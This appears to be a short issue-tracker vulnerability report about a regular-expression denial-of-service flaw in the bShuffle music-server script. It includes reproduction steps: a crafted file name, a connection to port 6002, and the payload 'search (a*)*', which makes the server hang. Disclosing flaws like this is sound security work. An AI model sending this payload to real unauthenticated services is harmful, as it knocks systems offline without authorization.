[vuln 01]: regular expression denial of service in bShuffle script

[1p22geo]

The script at scripts/bshuffle, probably often used as a simple music server is vulnerable to a Regular Expression Denial of Service (REDoS) vulnerability.
Regular expressions are submitted in the network interface, from untrusted sources, since the app is not authenticated.
File names are not received from the internet, but services built upon bShuffle (such as the one I have at home) may have this functionality. In this case exploitation is simple:

1. Create a file in the music folder for bShuffle with the name as such:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab.mp4

2. Open a connection to port 6002 and submit this:

bsh> get files
Command acknowledged, ['get', 'files']
Files:
    ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab.mp4

bsh> search (a*)*
[[connection hangs]]

3. The server hangs, and possibly crashes.

Music either cannot be stopped (only via ssh-ing into the machine, and killing mplayer there) or doesn't play at all.

[1p22geo]

Nah, not gonna fix it. Just leaving this here.